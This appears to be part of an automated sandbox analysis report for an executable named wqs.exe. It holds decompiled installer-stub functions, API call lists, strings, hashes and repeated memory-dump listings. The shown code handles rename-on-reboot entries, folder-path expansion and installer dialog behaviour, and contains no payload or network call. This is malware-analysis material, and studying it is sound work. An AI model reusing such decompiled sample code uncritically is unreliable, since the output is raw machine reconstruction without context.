MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

Call, xrefs: 00404AEB, 00404AF0, 00404AFB
A, xrefs: 00404AAD

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$Call
API String ID: 2624150263-209694386
Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\AppData\Roaming\wqs.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

[Rename], xrefs: 0040626C, 0040627E
%ls=%ls, xrefs: 004061F8

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Uniqueness

Uniqueness Score: -1.00%

Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				intOrPtr _t93;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t93 =  *0x433edc; // 0x5c9122
					_t44 =  *(_t93 - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000,00000000,00425A20,75B523A0), ref: 004066A8
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll, xrefs: 0040659F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719
Call, xrefs: 004065A4, 00406657, 0040665E, 00406662, 0040667F, 00406694, 004066A7, 004066BC, 004066E9, 0040671E, 00406724, 00406741, 00406754, 00406772, 00406778, 00406781, 004067B7
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-283261710
Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
CharNextW.USER32(?,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
CharPrevW.USER32(?,?,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004067C5
*?|<>/":, xrefs: 00406816

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2977677972
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x52c3a
					_t11 =  *0x42aa24;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(00052C3A,00000064,?), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

